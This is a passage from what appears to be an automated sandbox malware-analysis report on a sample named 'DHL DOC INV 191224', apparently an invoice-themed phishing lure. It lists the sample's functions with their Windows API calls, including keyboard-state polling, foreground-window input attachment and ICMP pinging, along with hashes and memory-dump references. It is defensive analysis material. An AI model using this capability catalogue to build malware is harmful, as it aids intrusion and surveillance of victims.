                                                                                                                        • CoGetObject.OLE32(?,00000000,003CFB98,?), ref: 003B3F2D
                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 003B3F40
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003B3FC4
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 003B3FD8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 429561992-0
                                                                                                                        • Opcode ID: a1f1cdc8e3faf352e59a46e82ed33d5fc63a7b0f14f99c76fd91d4e4ffd6cf5e
                                                                                                                        • Instruction ID: 78cd39ea43c748729d74e0037ada10ea9b5b5c83eae1a73bdcefa253f2ea7bc5
                                                                                                                        • Opcode Fuzzy Hash: a1f1cdc8e3faf352e59a46e82ed33d5fc63a7b0f14f99c76fd91d4e4ffd6cf5e
                                                                                                                        • Instruction Fuzzy Hash: 4AC133716083159FD702DF68C88496BBBE9FF89748F14491DFA8A9B610DB30EE05CB52
                                                                                                                        Function 003A7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 003A7AF3
                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003A7B8F
                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 003A7BA3
                                                                                                                        • CoCreateInstance.OLE32(003CFD08,00000000,00000001,003F6E6C,?), ref: 003A7BEF
                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003A7C74
                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 003A7CCC
                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 003A7D57
                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003A7D7A
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 003A7D81
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 003A7DD6
                                                                                                                        • CoUninitialize.OLE32 ref: 003A7DDC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2762341140-0
                                                                                                                        • Opcode ID: e85d7c82ffc349a9075fafb5c3c8e99969f8d9edd44db9c1b80cb745764e5e3e
                                                                                                                        • Instruction ID: 8e061cccada9b1a6df678ac32e7a08089a3db931223882e89ea4a05acd496960
                                                                                                                        • Opcode Fuzzy Hash: e85d7c82ffc349a9075fafb5c3c8e99969f8d9edd44db9c1b80cb745764e5e3e
                                                                                                                        • Instruction Fuzzy Hash: A0C11975A04209AFDB15DF64C8C8DAEBBB9FF49314F148499E81ADB261DB30ED41CB90
                                                                                                                        Function 0038FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0038FAAF
                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 0038FB08
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0038FB1A
                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0038FB3A
                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0038FB8D
                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 0038FBA1
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0038FBB6
                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 0038FBC3
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0038FBCC
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0038FBDE
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0038FBE9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706829360-0
                                                                                                                        • Opcode ID: fea73892ba9267a2ac5d0ae0923b9df779f6ee6516a61563f6f1157ac6b67fc6
                                                                                                                        • Instruction ID: a8036d78228577713be62477fbfec92dc105e5df2a0807285849826922621b11
                                                                                                                        • Opcode Fuzzy Hash: fea73892ba9267a2ac5d0ae0923b9df779f6ee6516a61563f6f1157ac6b67fc6
                                                                                                                        • Instruction Fuzzy Hash: FF414035A102199FCF06EF65C854DAEBBB9FF48354F008069E94AEB261DB34A945CF90
                                                                                                                        Function 00399C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00399CA1
                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00399D22
                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00399D3D
                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00399D57
                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00399D6C
                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00399D84
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00399D96
                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00399DAE
                                                                                                                        • GetKeyState.USER32(00000012), ref: 00399DC0
                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00399DD8
                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00399DEA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 541375521-0
                                                                                                                        • Opcode ID: b98c7967782f442c2b3fded549523d997c5d185dd8961d8226728cbadfeea2cf
                                                                                                                        • Instruction ID: 2b3450c2721d428efbef5f0b450f49eb4270e5d2071ee807e3c20b32c77d21a1
                                                                                                                        • Opcode Fuzzy Hash: b98c7967782f442c2b3fded549523d997c5d185dd8961d8226728cbadfeea2cf
                                                                                                                        • Instruction Fuzzy Hash: 7E41E7349047C96DFF33876988447B5BEA06F12344F09805FDAC6565C2EBA5ADC8CBA2
                                                                                                                        Function 003B055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 003B05BC
                                                                                                                        • inet_addr.WSOCK32(?), ref: 003B061C
                                                                                                                        • gethostbyname.WSOCK32(?), ref: 003B0628
                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 003B0636
                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003B06C6
                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003B06E5
                                                                                                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 003B07B9
                                                                                                                        • WSACleanup.WSOCK32 ref: 003B07BF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                        • String ID: Ping
                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                        • Opcode ID: 2fbca17a4ab7ab34b13fc26f5a59d91482ec9fd29d612ed7f597c8e3de340b2e
                                                                                                                        • Instruction ID: 6d2aa10958ee4f5f17ef04fcb883f46f0e2eb050c562e85890404565c9fdad84
                                                                                                                        • Opcode Fuzzy Hash: 2fbca17a4ab7ab34b13fc26f5a59d91482ec9fd29d612ed7f597c8e3de340b2e
                                                                                                                        • Instruction Fuzzy Hash: 86918C356082019FD326DF15C889F5ABBE4EF44318F1985A9E5698FAA2CB30FD41CF81
                                                                                                                        Function 003B8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharLower
                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                        • API String ID: 707087890-567219261
                                                                                                                        • Opcode ID: 675da58a37a4f1bef0f6adae3d0e05855f85c38f3ccac47b0b06820331407fe0
                                                                                                                        • Instruction ID: a85944c476fdbb752786f7c2737a2d5d6162752842f0496ea8cc5f1a2fb298aa
                                                                                                                        • Opcode Fuzzy Hash: 675da58a37a4f1bef0f6adae3d0e05855f85c38f3ccac47b0b06820331407fe0
                                                                                                                        • Instruction Fuzzy Hash: 5551A431A041169BCF16DF6CC9519FEB7A9BF64328B21422AEA56EB6C4DB30DD40C790
                                                                                                                        Function 003B372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32 ref: 003B3774
                                                                                                                        • CoUninitialize.OLE32 ref: 003B377F
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,003CFB78,?), ref: 003B37D9
                                                                                                                        • IIDFromString.OLE32(?,?), ref: 003B384C
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 003B38E4
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 003B3936
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                        • API String ID: 636576611-1287834457
                                                                                                                        • Opcode ID: 36fbcd15a4042c74752b99d856bfd0f25aefa7a015b50762f8aeb36f15491a8d
                                                                                                                        • Instruction ID: 6c2145bdeead7718e51a84abba2150945bef5494e42ae324d084d3358f3a7efd
                                                                                                                        • Opcode Fuzzy Hash: 36fbcd15a4042c74752b99d856bfd0f25aefa7a015b50762f8aeb36f15491a8d
                                                                                                                        • Instruction Fuzzy Hash: 7961B171608321AFD712DF54C889FAAB7E8EF49718F004809F685DB691D770EE48CB92
                                                                                                                        Function 003A3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 003A33CF
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003A33F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString$_wcslen
                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                        • API String ID: 4099089115-3080491070
                                                                                                                        • Opcode ID: e8047c0041cb6342a952ec847ced85d83dab656304688ec4a055db36a2fc5ab9
                                                                                                                        • Instruction ID: 94d66acb8dfe47d23b566a440513900d68ccecd0b59de5942d836da1b91f7433
                                                                                                                        • Opcode Fuzzy Hash: e8047c0041cb6342a952ec847ced85d83dab656304688ec4a055db36a2fc5ab9
                                                                                                                        • Instruction Fuzzy Hash: 11518F72D00209AADF17EBA0CD86EEEB778EF05340F108166F5057A062EB716F58DB60
                                                                                                                        Function 0039B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                        • API String ID: 1256254125-769500911
                                                                                                                        • Opcode ID: ade565452ec94c7356d9eebce60abb4553e05a29da88626a4a516b345ad0bbb1
                                                                                                                        • Instruction ID: 96d3b64e85b544d0daae8fc646399a6cb80f3c916a0e808293005defd1b34887
                                                                                                                        • Opcode Fuzzy Hash: ade565452ec94c7356d9eebce60abb4553e05a29da88626a4a516b345ad0bbb1
                                                                                                                        • Instruction Fuzzy Hash: 7D41F832A000279BCF116F7DDE915BEF7A5AFA0754B264229E461DB284E731ED81C790
                                                                                                                        Function 003A5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003A53A0
                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003A5416
                                                                                                                        • GetLastError.KERNEL32 ref: 003A5420
                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 003A54A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                        • Opcode ID: ac2a2c96f2756d6f2e4d7d95ac0d67541d44cf8a6d3ca421f8e07bde624a7034
                                                                                                                        • Instruction ID: 2056a1371d0bfa673f0b16fafd0cc8533d71c99014063813e573572eb57ca595
                                                                                                                        • Opcode Fuzzy Hash: ac2a2c96f2756d6f2e4d7d95ac0d67541d44cf8a6d3ca421f8e07bde624a7034
                                                                                                                        • Instruction Fuzzy Hash: A631D335A00604DFC712DF6AC485EA97BB8EF1A305F188055E505CF652DB74ED82CB90
                                                                                                                        Function 0039B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0039B151
                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B165
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0039B16C
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B17B
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0039B18D
                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B1A6
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B1B8
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B1FD
                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B212
                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0039A1E1,?,00000001), ref: 0039B21D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2156557900-0
                                                                                                                        • Opcode ID: 8644f06fca59fc5928128aa42e70354a4fe2e3bd07fd519b71b5ac2dd2eae7ec
                                                                                                                        • Instruction ID: ea0823f9069c55081f8496f7f1a1952c4d5cb9b85a0064f450f72886f2e73844
                                                                                                                        • Opcode Fuzzy Hash: 8644f06fca59fc5928128aa42e70354a4fe2e3bd07fd519b71b5ac2dd2eae7ec
                                                                                                                        • Instruction Fuzzy Hash: F331EC71510204BFDF129F24EE48FAEBBADFB1031AF154428FA44E6190C7B4EA018F28
                                                                                                                        Function 00362C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00362C94
                                                                                                                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                                                                                                                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                                                                                                                        • _free.LIBCMT ref: 00362CA0
                                                                                                                        • _free.LIBCMT ref: 00362CAB
                                                                                                                        • _free.LIBCMT ref: 00362CB6
                                                                                                                        • _free.LIBCMT ref: 00362CC1
                                                                                                                        • _free.LIBCMT ref: 00362CCC
                                                                                                                        • _free.LIBCMT ref: 00362CD7
                                                                                                                        • _free.LIBCMT ref: 00362CE2
                                                                                                                        • _free.LIBCMT ref: 00362CED
                                                                                                                        • _free.LIBCMT ref: 00362CFB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: 4691296bc750b94a2409472ee81b0a70e260c9a0efe49d3b49088edeed79e8e1
                                                                                                                        • Instruction ID: 3b06803e0e14af01bb3303c2585da209a1c99ce02c6a4707cf5cadf7692a63c7
                                                                                                                        • Opcode Fuzzy Hash: 4691296bc750b94a2409472ee81b0a70e260c9a0efe49d3b49088edeed79e8e1
                                                                                                                        • Instruction Fuzzy Hash: 47119676600508AFCB07EF54D842CDE3BA5FF46390F4284A5F9485F226D731EA609B90
                                                                                                                        Function 00331410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00331459
                                                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 003314F8
                                                                                                                        • UnregisterHotKey.USER32(?), ref: 003316DD
                                                                                                                        • DestroyWindow.USER32(?), ref: 003724B9
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0037251E
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0037254B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
